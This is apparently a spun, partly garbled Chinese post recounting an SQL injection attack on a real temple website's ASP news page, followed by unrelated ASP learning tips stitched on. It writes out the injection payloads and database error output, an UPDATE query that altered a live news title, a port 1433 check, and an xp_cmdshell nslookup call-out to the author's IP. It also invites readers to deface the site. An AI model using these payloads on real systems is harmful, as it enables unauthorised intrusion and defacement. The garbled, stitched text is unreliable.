ASP网页设计对少林寺网站的sql注进浸透

ActiveServerPage技术为应用开发商提供了基于脚本的直观、快速、高效的应用开发手段，极大地提高了开发的效果。在讨论ASP的安全性问题之前，让我们来看看ASP是怎么工作的。方才重新闻上听到一条动静：少林网站发布武功秘籍；呵呵！这个对照爽！
特地就往少林寺的网站上看了看，http://www.shaolin.org.cn/
翻开后，看到有旧事体系，随便扫瞄了一下几条旧事，都是html的，仿佛没甚么成绩，可是当我把鼠标放到首页旧事上时，发明他的毗连是“javascript:MM_openBrWindow(../../../asp/news_article.asp?
NewsID=649,news,scrollbars=yes,width=520,height=400)”，人人大概注重到了，有大概存在注进，我也是没事看电视，那就浸透一下尝尝。
1、输出地点：
http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649，
能够翻开旧事，申明url准确，加后，前往
----------------------------------------------------------------------------------
MicrosoftOLEDBProviderforSQLServer毛病80040e14
Unclosedquotationmarkbeforethecharacterstring.
/asp/lib/lib.asp，行710
----------------------------------------------------------------------------------
应当是sql数据库。
2、利用having1=1―,提醒
----------------------------------------------------------------------------------
MicrosoftOLEDBProviderforSQLServer毛病80040e14
ColumnShaolin_NewsList.NewsIDisinvalidintheselectlistbecauseitisnot
containedinanaggregatefunctionandthereisnoGROUPBYclause.
/asp/lib/lib.asp，行710
----------------------------------------------------------------------------------
很快就可以取得它的表shaolin_newslist的一切字段：newsid、NewsUpdateDat、NewsTitle、NewsContent
3、接上去我测试了一下数据库用户权限
http://www.shaolin.org.cn/asp/news_article.asp?NewsID=649;
update%20shaolin_newslist%20set%20NewsTitle=少林药局数百医疗摄生秘方初次向天下公然!%20where%20newsid=649--
图：
<p><imgsrc="http://www.coolersky.com/Images/webpage/20040808001.JPG"
alt="照片.JPG(663395bytes)"width="527"height="234"></p>


看来对表有完全权限，能够增编削
4、接着看1433开没
telnetwww.shaolin.org.cn1433
看来开着
5、那尝尝数据库操纵员的权限
当地监听udp53：NcCuClCp53
然后会见：
http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649;
execmaster.dbo.xp_cmdshellnslookupa.com*.*.*.*--
*为我的ip地点，
没有反响，那末应当不是sysadmin权限了
看来权限就是这些，由于没有体系的搜集信息，也不盘算怎样，就到此为止！实在另有良多页面都存在这个成绩，好比：
http://www.shaolin.org.cn/html/html/wu/menu4.htm
http://www.shaolin.org.cn/html/html/wu/teach_wushu.asp
中传送参数的地位，瞥见那些尽世武功了吗？假如你乐意，能够给他添一条“XXX”甚么的，呵呵！
实在，在1年前就用过相似办法测试过当地对照年夜的几个信息港，随后就给他们提交了毛病呈报，可是到如今毛病还在那边摆着，为了不给本人惹贫苦，至今也没有发布出来，仍是等他们修补了，我再发布细节吧！
====================================================================================================
发给网管没反响，在bbs上，我注册coolersky后，逝世活没有找到怎样发帖，没辙！任天由命吧，最好不要被小日本弄定！


由于ASP还是一种Script语言所没除了大量使用组件外，没有办法提高其工作效率。它必须面对即时编绎的时间考验，同时我们还不知其背后的组件会是一个什么样的状况；

从事这个行业，那么你可以学ASP语言，简单快速上手，熟练dreamweav排版，写asp代码，熟练photoshop处理图片，打好基础就行了

多看多学多思。多看一些关于ASP的书籍，一方面可以扩展知识面一方面可以鉴借别人是如何掌握、运用ASP的;多学善于关注别人，向同学老师多多学习，不论知识的大小;多思则是要将学到的知识灵活运用。

代码逻辑混乱，难于管理：由于ASP是脚本语言混合html编程，所以你很难看清代码的逻辑关系，并且随着程序的复杂性增加，使得代码的管理十分困难，甚至超出一个程序员所能达到的管理能力，从而造成出错或这样那样的问题。

作为IE上广为流传的动态网页开发技术,ASP以它简单易学博得了广大WEB程序爱好这的青睐,而且它对运行环境和开发品台的不挑剔,以及有大量有效的参考手册,极大的推广了它的发展。

在平时的学习过程中要注意现学现用，注重运用，在掌握了一定的基础知识后，我们可以尝试做一些网页，也许在开始的时候我们可能会遇到很多问题，比如说如何很好的构建基本框架。

ASP主要是用好六个对象，其实最主要的是用好其中两个：response和request，就可以随心所欲地控制网页变换和响应用户动作了。

ASP.Net摆脱了以前ASP使用脚本语言来编程的缺点，理论上可以使用任何编程语言包括C++,VB,JS等等，当然，最合适的编程语言还是MS为.NetFrmaework专门推出的C(读csharp)，它可以看作是VC和Java的混合体吧。

另外因为asp需要使用组件，所以了解一点组件的知识(ADODB也是组件)